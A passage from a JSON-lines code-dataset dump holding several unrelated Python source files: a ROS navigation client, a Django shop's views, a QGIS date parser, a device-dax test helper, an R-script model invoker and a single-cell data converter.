theta)\n\n t0=rospy.Time.now()\n goal=MoveBaseGoal()\n goal.target_pose.header.stamp=t0\n goal.target_pose.header.frame_id=\"map\"\n\t\n goal.target_pose.pose.position = Point(x, y, 0)\n goal.target_pose.pose.orientation.x = target_quat[0]\n goal.target_pose.pose.orientation.y = target_quat[1]\n goal.target_pose.pose.orientation.z = target_quat[2]\n goal.target_pose.pose.orientation.w = target_quat[3] \n\n # Sends the goal to the action server.\n self.client.send_goal(goal)\n\n # Waits for the server to finish performing the action.\n # let us wait 1 minute to reach the goal and abort otherwise\n reached_the_goal = self.client.wait_for_result(rospy.Duration.from_sec(90))\n if not reached_the_goal:\n rospy.logwarn(\"I was not able to reach the goal within the\\\n allocated time\")\n self.client.cancel_goal()\n \n # Prints out the result of executing the action\n return self.client.get_state()\n\n\nif __name__ == '__main__':\n rospy.init_node('movebase_client_py')\n explorer = Explorer()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n\n \n","sub_path":"navigation/src/move_base_controller.py","file_name":"move_base_controller.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"427751656","text":"\n\nclass View:\n\n def get_user_entry(self, msg_display, msg_error, value_type, assertions=None, default_value=None):\n while True:\n value = input(msg_display)\n if value_type == \"numeric\":\n if value.isnumeric():\n value = int(value)\n return value\n else:\n print(msg_error)\n continue\n if value_type == \"num_superior\":\n if value.isnumeric():\n value = int(value)\n if value >= default_value:\n return value\n else:\n print(msg_error)\n continue\n else:\n print(msg_error)\n continue\n if value_type == \"string\":\n try:\n float(value)\n print(msg_error)\n continue\n except ValueError:\n return value\n elif value_type == \"date\":\n if self.verify_date(value):\n return value\n else:\n print(msg_error)\n continue\n elif value_type == \"selection\":\n if value in assertions:\n return value\n else:\n print(msg_error)\n continue\n\n @staticmethod\n def verify_date(value_to_test):\n if \"-\" not in value_to_test:\n return False\n else:\n splitted_date = value_to_test.split(\"-\")\n for date in splitted_date:\n if not date.isnumeric():\n return False\n return True\n\n @staticmethod\n def build_selection(iterable: list, display_msg: str, assertions: list) -> dict:\n display_msg = display_msg\n assertions = assertions\n\n for i, data in enumerate(iterable):\n display_msg = display_msg + f\"{i+1} - {data['name']}\\n\"\n assertions.append(str(i + 1))\n\n return {\n \"msg\": display_msg,\n \"assertions\": assertions\n }\n","sub_path":"views/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"195054321","text":"from builtins import str\nfrom builtins import object\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom qgis.core import *\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\n#Convenient function to debug\nlog = lambda m: QgsMessageLog.logMessage(m, \"visualist\")\n\nEXCEL = ['ExcelDate', 'ExcelTime', 'ExcelDateTime']\nDATE = [EXCEL[0], '%d.%m.%Y', '%d-%m-%Y']\nTIME = [EXCEL[1], '%H:%M:%S']\nDURATION = [EXCEL[1], '%S', '%H:%M:%S']\nDATETIME = [EXCEL[2], '%d.%m.%y %H:%M:%S', '%d.%m.%Y %H:%M:%S', '%d/%m/%Y %H:%M:%S', '%Y-%m-%d %H:%M:%S']\n\nT1 = 'time1'\nT2 = 'time2'\nD1 = 'date1'\nD2 = 'date2'\nDUR = 'duration'\nFEAT = 'feature'\n\n#time = (year,month,day,hour,minute,second)\nclass temporalAnalyser(object):\n\n def __init__(self, layer, feedback):\n\n self.feedback = feedback\n\n self.fields = {D1:None, T1:None, D2:None, T2:None, DUR:None}\n self.formats = {D1:None, T1:None, D2:None, T2:None, DUR:None}\n self.parsed = {} #key: feature id, value: parsed {D1:None, T1:None, D2:None, T2:None, DUR:None}\n self.empty = {D1:0, T1:0, D2:0, T2:0, DUR:0} #To show number of missing data\n\n self.dataLayer = layer\n self.dataId = layer.id()\n\n def tr(self, text, context = \"temporalAnalyser\"):\n return QApplication.translate(context, text)\n\n def setLayer(self, layer):\n self.dataLayer = layer\n\n def parse(self):\n provider = self.dataLayer.dataProvider()\n for feat in provider.getFeatures():\n self.parseFeature(feat)\n error = \"\"+self.tr(\"Empty or unparsable values\")+\":
\"\n e = False\n for k, v in self.empty.items():\n if v > 0: e = True\n error += \"\" + str(v) + \" \"+self.tr(\"values for\")+\" \" + str(k).upper() + \"
\"\n if e:\n self.feedback.reportError(self.tr('{}').format(error))\n\n def parseFeature(self, feat):\n line = {D1:None, T1:None, D2:None, T2:None, DUR:None}\n attrMap = feat.attributes()\n provider = self.dataLayer.dataProvider()\n for key, v in self.fields.items():\n if v == None:\n continue\n k = provider.fieldNameIndex(v)\n value = attrMap[int(k)]\n\n format = self.formats[key]\n if format in EXCEL:\n try: parsed = xlToDt(value, format)\n except: parsed = None\n else:\n if str(format) == '%S':\n t = int(value)\n h = int(t / 3600)\n m = int((t-h * 3600) / 60)\n s = int(t - h * 3600 - m * 60)\n parsed = datetime(1900, 1, 1, h, m, s)\n else:\n parsed = datetime.strptime(str(value), str(format))\n if parsed is None:\n self.empty[key] += 1\n line[key] = parsed\n self.parsed[feat.id()] = line\n\n\n def setDateTime(self, date1, time1):\n self.fields['date1'] = date1\n self.fields['time1'] = time1\n\n def setDateTimeDuration(self, date1, time1, duration):\n self.setDateTime(date1, time1)\n self.fields['duration'] = duration\n self.fields['date2'] = None\n self.fields['time2'] = None\n\n def setDateTimes(self, date1, time1, date2, time2):\n self.setDateTime(date1, time1)\n self.fields['date2'] = date2\n self.fields['time2'] = time2\n self.fields['duration'] = None\n\n def setFormatersDateTime(self, date1, time1):\n self.formats['date1'] = date1\n self.formats['time1'] = time1\n\n def setFormatersDateTimeDuration(self, date1, time1, duration):\n self.setFormatersDateTime(date1, time1)\n self.formats['duration'] = duration\n self.formats['date2'] = None\n self.formats['time2'] = None\n\n def setFormatersDateTimes(self, date1, time1, date2, time2):\n self.setFormatersDateTime(date1, time1)\n self.formats['date2'] = date2\n self.formats['time2'] = time2\n self.formats['duration'] = None\n\ndef getDates(data, i):\n dt1,dt2 = None, None\n if data[D1][i] is not None:\n if data[T1][i] is not None and len(data[T1]) > 0:\n dt1 = datetime.combine(data[D1][i].date(), data[T1][i].time())\n else:\n dt1 = data[D1][i]\n elif data[T1][i] is not None:\n dt1 = data[T1][i]\n\n if data[D2][i] is not None and len(data[D2]) > 0:\n if data[T2][i] is not None and len(data[T2]) > 0:\n dt2 = datetime.combine(data[D2][i].date(), data[T2][i].time())\n else:\n dt2 = data[D2][i]\n elif data[DUR][i] is not None and len(data[DUR]) > 0:\n if dt1 is not None:\n t = data[DUR][i].time()\n delta = timedelta(hours=t.hour,minutes=t.minute, seconds=t.second)\n dt2 = dt1 + delta\n if dt2 is None: dt2 = dt1\n return [dt1, dt2]\n\ndef xlToDt(excel, type):\n if excel is None or len(excel) == 0:\n return None\n t = xlrd.xldate_as_tuple(float(excel), 0)\n #self.warning(str(excel)+\" -> \"+str(t))\n if type == EXCEL[0]:\n return datetime(t[0], t[1], t[2], 0, 0, 0)\n elif type == EXCEL[1]:\n return datetime(1900, 1, 1, t[3], t[4], t[5])\n elif type == EXCEL[2]:\n return datetime(t[0], t[1], t[2], t[3], t[4], t[5])\n else:\n return None\n","sub_path":"TimeFormater.py","file_name":"TimeFormater.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"476690605","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404,redirect\nfrom django.contrib.auth.models import User\nfrom .models import *\nimport random\n\nfrom django.contrib import messages\nimport string\nfrom .forms import *\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.forms import AuthenticationForm, authenticate\nfrom django.contrib.auth import logout, login\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\n\n\n# Create your views here.\ndef create_ref_code():\n return ''.join(random.choices(string.ascii_lowercase + string.digits, k=20))\n\n\ndef log_in(request):\n if request.method == 'POST':\n ak = AuthenticationForm(data=request.POST,request=request)\n if ak.is_valid():\n username = ak.cleaned_data.get('username')\n password = ak.cleaned_data.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('product')\n else:\n messages.error(request,'Invalid credentials')\n return redirect('login')\n else:\n ak = AuthenticationForm()\n return render(request, 'user/login.html', {'pl': ak})\n\n\ndef log_out(request):\n if request.user:\n logout(request)\n return redirect('product')\n else:\n return redirect('login')\n\n\ndef register(request):\n if request.method == 'POST':\n ak = regi(request.POST)\n if ak.is_valid():\n ak.save()\n messages.success(request,'user successfully created')\n return redirect('login')\n else:\n messages.error(request,'user not created due to values you gave or username already exist')\n return redirect('register')\n else:\n ak = regi()\n return render(request, 'user/register.html', {'pok': ak})\n\n\nfrom random import shuffle\n\ndef homeview(request):\n categoy = category.objects.get(name='clothes')\n prod = item.objects.filter(cat_name=categoy)\n categ = category.objects.get(name='electronics')\n frod = item.objects.filter(cat_name=categ)\n return render(request, 'shop/product.html', {'prod': prod,'frod':frod})\n\n\ndef productview(request):\n prod = item.objects.all()\n return render(request, 'shop/product2.html', {'prod': prod})\n\n\ndef detailview(request, name):\n categ = category.objects.get(name='electronics')\n frod = item.objects.filter(cat_name=categ)\n prod = get_object_or_404(item,namee=name)\n return render(request, 'shop/detail.html', {'a': prod,'frod':frod})\n\n\ndef categoryview(request):\n cat = category.objects.all().order_by('name')\n return render(request, 'shop/cat_list.html', {'cat': cat})\n\n\ndef catprod(request,name):\n gro = category.objects.get(name=name)\n prod = item.objects.filter(cat_name=gro)\n return render(request, 'shop/cat_product.html', {'cat': prod})\n\n@login_required(login_url='/login')\ndef cartsview(request):\n ca = cart.objects.filter(name=request.user)\n grand_total = 0\n print(ca)\n for a in ca:\n grand_total += a.price\n return render(request, 'shop/cart.html', {'cd': ca,'g':grand_total})\n\n@login_required(login_url='/login')\ndef cartsedit(request, name):\n pro = item.objects.get(namee=name)\n ca = cart.objects.filter(item_name=pro)\n if ca:\n b = cart.objects.get(item_name=pro)\n if b.quantity > 1:\n b.quantity -= 1\n b.price = b.price - b.item_name.price\n b.save()\n messages.success(request,'product remove from cart')\n return HttpResponseRedirect('/cart')\n else:\n b.delete()\n messages.success(request,'product deleted from cart')\n return HttpResponseRedirect('/cart')\n\n\n# product try view\n@login_required(login_url='/login')\ndef producttryview(request, name):\n pro = item.objects.get(namee=name)\n if troy.objects.filter(item_name=pro).exists():\n messages.success(request, 'sorry sir this product is already on your try list')\n return redirect('try')\n elif troy.objects.create(user=request.user, item_name=pro):\n messages.success(request, 'product add to try list')\n return redirect('try')\n\n@login_required(login_url='/login')\ndef triedview(request):\n tt = troy.objects.filter(user=request.user)\n return render(request, 'shop/try.html', {'tt': tt})\n\n@login_required(login_url='/login')\ndef cartsdelete(request, name):\n pro = item.objects.get(namee=name)\n ca = cart.objects.filter(item_name=pro)\n if ca:\n b = cart.objects.get(item_name=pro)\n b.delete()\n messages.success(request, 'product deleted from cart')\n return HttpResponseRedirect('/cart')\n else:\n return HttpResponseRedirect('/product')\n\n\n# add to cart\n@login_required(login_url='/login')\ndef carts_item(request, name):\n pro = item.objects.get(namee=name)\n ca = cart.objects.filter(item_name=pro)\n if ca:\n b = cart.objects.get(item_name=pro)\n b.quantity += 1\n b.price += b.item_name.price\n b.save()\n messages.success(request, 'add to cart successfully')\n return HttpResponseRedirect('/cart')\n elif cart.objects.create(name=request.user, item_name=pro,price=pro.price):\n return HttpResponseRedirect('/cart')\n\n@login_required(login_url='/login')\ndef checkoutview(request):\n try:\n loca = item.objects.all()\n ca = cart.objects.filter(name=request.user)\n if request.method == 'POST':\n ap = addresses(request.POST)\n if ap.is_valid():\n adress1 = ap.cleaned_data.get('address1')\n adress2 = ap.cleaned_data.get('address2')\n zip_code = ap.cleaned_data.get('zip_code')\n state = ap.cleaned_data.get('state')\n country = ap.cleaned_data.get('country')\n po = address(name=request.user, address1=adress1, address2=adress2, zip_code=zip_code, state=state,\n country=country)\n\n po.save()\n pd = create_ref_code()\n for a in ca:\n ak =a.item_name\n pa = order.objects.create(itemss=ak,quantity=a.quantity,name=request.user, addressa=po, product_id=pd,ordered=True)\n pa.save()\n ca.delete()\n return HttpResponseRedirect('/payment')\n else:\n ap = addresses()\n return render(request, 'shop/checkout.html', {'ap': ap})\n except ObjectDoesNotExist:\n return HttpResponse('object does not exist')\n\n@login_required(login_url='/login')\ndef send_try(request, name):\n pro = item.objects.get(namee=name)\n ca = troy.objects.get(item_name=pro)\n if ca.tried_complete == True:\n messages.success(request, 'you already tried this product please choose another one')\n return HttpResponseRedirect('/try')\n elif ca:\n ca.tried_complete = True\n ca.save()\n messages.success(request, 'please give us reviews')\n return HttpResponseRedirect('/try')\n\n\n else:\n return HttpResponseRedirect('try')\n\n\ndef home(request):\n return render(request, 'shop/home.html')\n\n# def curtaclan():\n# ak = len(cart.objects.filter(name=request.user))\n\n\ndef payme(request):\n ap = order.objects.filter(ordered=False)\n print(ap)\n return render(request, 'shop/payment.html')\n\n\ndef aboutus(request):\n return render(request, 'shop/payment.html')\ndef contact(request):\n return render(request, 'shop/payment.html')\n\ndef search(request):\n if request.method == 'GET':\n sear = request.GET['namee']\n ap = item.objects.filter(namee__startswith=sear)\n return render(request, 'shop/search.html',{'s':ap})\n else:\n return HttpResponse('thers noting here like that')\n","sub_path":"aladin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"151859349","text":"#\n# Copyright 2019-2020, Intel Corporation\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in\n# the documentation and/or other materials provided with the\n# distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\n\"\"\"Device dax context classes and utilities\"\"\"\n\nimport copy\nimport itertools\nimport os\nimport sys\n\nimport context as ctx\nimport futils\nimport tools\n\n\nclass DevDax():\n \"\"\"\n Class representing dax device and its parameters\n \"\"\"\n def __init__(self, name, alignment=None, min_size=None, max_size=None):\n self.name = name\n self.path = None\n self._req_alignment = alignment\n self._req_min_size = min_size\n self._req_max_size = max_size\n self.assigned = False\n\n def __str__(self):\n return self.name\n\n def try_assign(self, path):\n \"\"\"\n Try assigning to real dax device, identified by its path,\n provided it meets defined requirements. In case of success, set DevDax\n object attributes (like size and/or alignment) to the real dax device\n values and return True. Return False otherwise.\n \"\"\"\n ndctl = tools.Ndctl()\n\n p_size = ndctl.get_dev_size(path)\n p_align = ndctl.get_dev_alignment(path)\n\n if self._req_min_size and p_size < self._req_min_size:\n return False\n if self._req_max_size and p_size > self._req_max_size:\n return False\n if self._req_alignment and p_align != self._req_alignment:\n return False\n\n self.path = path\n self.size = p_size\n self.alignment = p_align\n self.assigned = True\n return True\n\n\nclass DevDaxes():\n \"\"\"\n Dax device context class representing a set of dax devices required\n for test\n \"\"\"\n def __init__(self, *dax_devices):\n self.dax_devices = tuple(dax_devices)\n for dd in dax_devices:\n setattr(self, dd.name, dd)\n\n def setup(self, **kwargs):\n tools = kwargs['tools']\n for dd in self.dax_devices:\n proc = tools.pmemdetect('-d', dd.path)\n if proc.returncode != 0:\n raise futils.Fail('checking {} with pmemdetect failed:{}{}'\n .format(dd.path, os.linesep, proc.stdout))\n\n def __str__(self):\n return 'devdax'\n\n @classmethod\n def filter(cls, config, msg, tc):\n\n dax_devices, _ = ctx.get_requirement(tc, 'devdax', ())\n if not dax_devices:\n return ctx.NO_CONTEXT\n elif sys.platform == 'win32' and tc.enabled:\n raise futils.Fail('dax device functionality required by \"{}\" is '\n 'not available on Windows. Please disable the '\n 'test for this platform'.format(tc))\n\n if not config.device_dax_path:\n raise futils.Skip('No dax devices defined in testconfig')\n\n if len(dax_devices) > len(config.device_dax_path):\n raise futils.Skip('Not enough dax devices defined in testconfig '\n '({} needed)'.format(len(dax_devices)))\n\n ndctl = tools.Ndctl()\n for c in config.device_dax_path:\n if not ndctl.is_devdax(c):\n raise futils.Fail('{} is not a dax device'.format(c))\n\n assigned = _try_assign_by_requirements(config.device_dax_path,\n dax_devices)\n if not assigned:\n raise futils.Skip('Dax devices in test configuration do not '\n 'meet test requirements')\n\n return [DevDaxes(*assigned), ]\n\n\ndef _try_assign_by_requirements(configured, required):\n \"\"\"\n Try assigning dax devices defined as paths in test configuration to\n dax device objects taking their requirements into account.\n Return a sequence of all requirement objects if they were\n successfully assigned to existing dax, otherwise return None.\n Since the order in which requirement objects are tried to be\n assigned may affect the final outcome, all permutations are checked.\n \"\"\"\n permutations = itertools.permutations(required)\n for p in permutations:\n conf_copy = configured[:]\n req_copy = copy.deepcopy(p)\n for dd in req_copy:\n for i, c in enumerate(conf_copy):\n if dd.try_assign(c):\n conf_copy.pop(i)\n break\n\n if not dd.assigned:\n # at least one device dax requirement cannot be assigned\n # to any of devices defined in the configuration,\n # try another permutation\n break\n\n if all(dd.assigned for dd in req_copy):\n return req_copy\n return None\n\n\ndef require_devdax(*dax_devices, **kwargs):\n def wrapped(tc):\n ctx.add_requirement(tc, 'devdax', tuple(dax_devices), **kwargs)\n return tc\n return wrapped\n","sub_path":"src/test/unittest/devdax.py","file_name":"devdax.py","file_ext":"py","file_size_in_byte":6237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"326566526","text":"import logging\nimport subprocess\nimport re\n\nfrom time import sleep, time, ctime\nfrom datetime import datetime\nfrom random import random\n\n\nlogger = logging.getLogger(__name__)\n\nclass Model:\n def __init__(self, genre):\n self.genre = genre.upper()\n self.final_score = 0\n self.scores = []\n self.dates = []\n self.created = time()\n\n def process(self):\n if self.genre not in Genres():\n result = False\n message = 'Genre \"%s\" is not presented, sorry' % self.genre\n return result, message\n\n stdout, stderr = run_R_script(self.genre)\n if 'error' in stderr.lower():\n result = False\n message = stderr\n logger.error(stderr)\n return result, message\n\n self._process_script_result(stdout)\n self._process_scores_rating_for_Ljung_test()\n self._process_final_score()\n\n result = True\n message = ''\n return result, message\n \n def valid(self):\n return time() - self.created < 1000*60*60\n\n def _process_script_result(self, stdout):\n control_seq = re.compile(r'\"\\!\\&(\\w+)\"')\n command = None\n read_lines = 0\n\n vector_values = re.compile(r'(\\d+)')\n q_pattern = re.compile(r'^Q\\*\\s=\\s(\\d+\\.\\d+)')\n p_pattern = re.compile(r'p-value\\s[=<>]\\s(.+)$')\n\n accuracy_description = {\n 'ME': 'Mean Error',\n 'RMSE': 'Root Mean Squared Error',\n 'MAE': 'Mean Absolute Error',\n 'MPE': 'Mean Percentage Error',\n 'MAPE': 'Mean Absolute Scaled Error',\n 'MASE': 'Mean Absolute Scaled Error',\n 'ACF1': 'Autocorrelation of errors at lag 1',\n 'Q': 'Ljung-Box test',\n 'Q p-value': 'Probability value of Q*',\n 'χ squared': 'Ljung-Box test',\n 'χ^2 p-value': 'Probability value of χ squared',\n }\n\n for line in stdout.split('\\n'):\n if command is None:\n seq = control_seq.findall(line)\n if len(seq) > 0:\n command = seq[0]\n read_lines = 0\n continue\n\n if len(line) > 0 and line[0] == '[':\n line = line[line.index(']') + 1:]\n\n if command == 'dates':\n dates = vector_values.findall(line)\n beginning = datetime(datetime.now().year, 1, 1).timestamp()\n for date in dates:\n self.dates.append(datetime.fromtimestamp(beginning + int(date)*24*60*60))\n\n command = None\n elif command in accuracy_description.keys() and read_lines == 1:\n line = line.strip()\n space_index = line.index(' ')\n training_set = float(line[:space_index])\n test_set = float(line[space_index:])\n raw, rating = self._calculate_rating(command, training_set)\n self.scores.append({\n 'name': command,\n 'value': training_set,\n 'help': accuracy_description[command],\n 'rating': rating,\n '_raw': raw,\n '_training_set': training_set,\n '_test_set': test_set\n })\n command = None\n elif command == 'ljung':\n if read_lines == 4:\n q_values = q_pattern.findall(line)\n if len(q_values) == 0:\n logger.error('Could not parse Q* value')\n else:\n q_value = float(q_values[0])\n self.scores.append({\n 'name': 'Q',\n 'value': q_value,\n 'help': accuracy_description['Q']\n })\n p_values = p_pattern.findall(line)\n if len(p_values) == 0:\n logger.error('Could not parse p-value')\n else:\n p_value = float(p_values[0])\n raw, rating = self._calculate_rating_for_p_value(p_value)\n self.scores.append({\n 'name': 'Q p-value',\n 'value': p_value,\n 'help': accuracy_description['Q p-value'],\n 'rating': rating,\n '_raw': raw\n })\n \n command = None\n elif command == 'chisqr':\n if read_lines == 1:\n chi_value = float(line)\n self.scores.append({\n 'name': 'χ squared',\n 'value': chi_value,\n 'help': accuracy_description['χ squared']\n })\n\n command = None\n elif command == 'chipvalue':\n if read_lines == 0:\n chi_p_value = float(line)\n raw, rating = self._calculate_rating_for_p_value(chi_p_value)\n self.scores.append({\n 'name': 'χ^2 p-value',\n 'value': chi_p_value,\n 'help': accuracy_description['χ^2 p-value'],\n 'rating': rating,\n '_raw': raw\n })\n\n command = None\n\n read_lines = read_lines + 1\n\n def _process_scores_rating_for_Ljung_test(self):\n q = None\n q_p_value = None\n chi = None\n chi_p_value = None\n for score in self.scores:\n if score['name'] == 'Q':\n q = score\n elif score['name'] == 'Q p-value':\n q_p_value = score\n elif score['name'] == 'χ squared':\n chi = score\n elif score['name'] == 'χ^2 p-value':\n chi_p_value = score\n\n if q_p_value['_raw'] < 0.80 or chi_p_value['_raw'] < 0.80:\n q['rating'] = 'x'\n q['_raw'] = 0\n chi['rating'] = 'x'\n chi['_raw'] = 0\n else:\n raw, rating = self._calculate_rating_for_Q(q['value'], chi['value'])\n q['rating'] = rating\n q['_raw'] = raw\n chi['rating'] = rating\n chi['_raw'] = raw\n\n def _process_final_score(self):\n final_score = 0\n if len(self.scores) == 0:\n self.final_score = 0\n return\n\n weight_distribution = {\n 'ME': 0.03,\n 'RMSE': 0.03,\n 'MAE': 0.03,\n 'MPE': 0.03,\n 'MAPE': 0.03,\n 'MASE': 0.03,\n 'ACF1': 0.03,\n 'Q': 0.25,\n 'Q p-value': 0.145,\n 'χ squared': 0.25,\n 'χ^2 p-value': 0.145,\n }\n\n for score in self.scores:\n per_score = weight_distribution[score['name']]\n score_weighted = score['_raw'] * per_score\n score_weighted = per_score if score_weighted > per_score else score_weighted\n final_score = final_score + score_weighted\n\n final_score = round(final_score * 100)\n self.final_score = final_score\n\n def _calculate_rating(self, name, training_set):\n score_system = {\n 'ME': (0.5, 1.5),\n 'RMSE': (1.0, 2.5),\n 'MAE': (1.0, 2.5),\n 'MPE': (1.0, 2.5),\n 'MAPE': (4.0, 10.0),\n 'MASE': (1.0, 2.0),\n 'ACF1': (0.05, 0.5),\n }\n\n upper_limit = score_system[name]\n value = abs(training_set)\n if value == 0:\n return 0, '***'\n if value < upper_limit[0]:\n rating = '***'\n elif value < upper_limit[1]:\n rating= '**'\n else:\n rating = '*'\n\n return value, rating\n\n def _calculate_rating_for_Q(self, q, chi):\n if q > chi:\n return 1, '***'\n return 0, '*'\n\n def _calculate_rating_for_p_value(self, p):\n if p < 0.001:\n return 1.00, '***'\n if p < 0.01:\n return 0.85, '**'\n if p < 0.05:\n return 0.70, '*'\n if p < 0.1:\n return 0.50, '.'\n return 0, 'x'\n\n\ndef Genres():\n stdout, stderr = run_R_script('all')\n if 'error' in stderr.lower():\n logger.error(stderr)\n genre_value = re.compile(r'\"([a-zA-Z/&\\s]+)\"')\n return genre_value.findall(stdout)\n\ndef run_R_script(genre):\n proc = subprocess.Popen(\n ['Rscript', '--vanilla', '../model.R', '--genre=%s' % genre],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n proc.wait()\n stdout, stderr = proc.communicate()\n return str(stdout, 'utf-8'), str(stderr, 'utf-8')\n","sub_path":"course_project/service/analytics/invoker.py","file_name":"invoker.py","file_ext":"py","file_size_in_byte":8813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"124772164","text":"import pandas\nimport h5py\nfrom sparsedat import wrappers as SDT_wrappers\nfrom sparsedat import Sparse_Data_Table\n\n\ndef write_pandas_csv(data_frame, file_path):\n pandas.DataFrame(data_frame)\\\n .to_csv(file_path, sep=',', encoding='utf-8', chunksize=1000)\n\n\ndef read_pandas_csv(file_path):\n return pandas.read_csv(file_path, sep=\",\", header=0, index_col=0)\n\n\ndef load_mtx(mtx_file_path, features_file_path, barcodes_file_path):\n\n if features_file_path is not None:\n with open(features_file_path, \"r\") as row_names_file:\n row_names = [line[:-1].strip() for line in row_names_file]\n row_names = [\" \".join(row_name.split(\"\\t\")[0:2])\n for row_name in row_names]\n else:\n row_names = None\n\n if barcodes_file_path is not None:\n with open(barcodes_file_path, \"r\") as column_names_file:\n column_names = [line[:-1].strip() for line in column_names_file]\n\n sdt = SDT_wrappers.load_mtx(mtx_file_path)\n sdt.row_names = row_names\n sdt.column_names = column_names\n\n return sdt\n\n\ndef convert_h5_to_sdt(\n h5_file_path,\n SDT_file_path,\n cells_as_rows=True\n):\n h5_file = h5py.File(h5_file_path)\n\n cellranger_version = 2\n\n if \"matrix\" in h5_file:\n cellranger_version = 3\n\n matrix_name = None\n\n if cellranger_version == 2:\n for key, value in h5_file.items():\n matrix_name = key\n break\n else:\n matrix_name = \"matrix\"\n\n sdt = Sparse_Data_Table()\n\n data = h5_file[matrix_name][\"data\"][()]\n indices = h5_file[matrix_name][\"indices\"][()]\n indptr = h5_file[matrix_name][\"indptr\"][()]\n\n if indices[0] > indices[1]:\n for column_index in range(len(indptr) - 1):\n data[indptr[column_index]:indptr[column_index + 1]] = \\\n data[indptr[column_index]:indptr[column_index + 1]][::-1]\n indices[indptr[column_index]:indptr[column_index + 1]] = \\\n indices[indptr[column_index]:indptr[column_index + 1]][::-1]\n else:\n for column_index in range(len(indptr) - 1):\n data[indptr[column_index]:indptr[column_index + 1]] = \\\n data[indptr[column_index]:indptr[column_index + 1]]\n indices[indptr[column_index]:indptr[column_index + 1]] = \\\n indices[indptr[column_index]:indptr[column_index + 1]]\n\n sdt.from_sparse_column_entries(\n (\n data,\n indices,\n indptr\n ),\n h5_file[matrix_name][\"shape\"][0],\n h5_file[matrix_name][\"shape\"][1]\n )\n\n if cellranger_version == 2:\n gene_names = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"gene_names\"])]\n gene_ids = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"gene_ids\"])]\n else:\n gene_names = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"features\"][\"name\"])]\n gene_ids = [x.decode(\"UTF-8\")\n for x in list(h5_file[matrix_name][\"features\"][\"id\"])]\n\n gene_name_indices = {}\n\n disambiguated_gene_names = []\n\n for gene_index, gene in enumerate(gene_names):\n if gene not in gene_name_indices:\n gene_name_indices[gene] = [gene_ids[gene_index]]\n else:\n gene_name_indices[gene].append(gene_ids[gene_index])\n\n for gene_index, gene in enumerate(gene_names):\n\n if len(gene_name_indices[gene]) > 1:\n # Figure out which gene this is, as sorted by id\n this_gene_id = gene_ids[gene_index]\n duplicate_gene_index = sorted(gene_name_indices[gene]).index(\n this_gene_id)\n disambiguated_gene_name = \"%s_%i\" % (gene, duplicate_gene_index + 1)\n disambiguated_gene_names.append(disambiguated_gene_name)\n else:\n disambiguated_gene_names.append(gene)\n\n sdt.column_names = [x.decode(\"utf-8\") for x in\n h5_file[matrix_name][\"barcodes\"][()]]\n sdt.row_names = disambiguated_gene_names\n\n # Transpose so that rows are cells\n if cells_as_rows:\n sdt.transpose()\n\n sdt.save(SDT_file_path)\n\n return sdt\n","sub_path":"lesson_8/lesson_8/venv/lib/python3.8/site-packages/scrapi/utils/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":4188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"324673055","text":"import unittest\nfrom pygo1963.model.OpeningKnowledge import OpeningKnowledge\nfrom pygo1963.model.Constants import WHITE_COLOR, BLACK_COLOR\nfrom pygo1963.model.Board import Board\nfrom pygo1963.model.Move import Move\nfrom pygo1963.model.Vertex import Vertex\n\nclass OpeningKnowledgeTest(unittest.TestCase):\n\n def setUp(self):\n self.board = Board(6)\n\n def testFirstMove(self):\n \n openingKnowledge = OpeningKnowledge(WHITE_COLOR)\n \n move = openingKnowledge.get_opening_move(self.board)\n \n self.assertTrue(move)\n\n 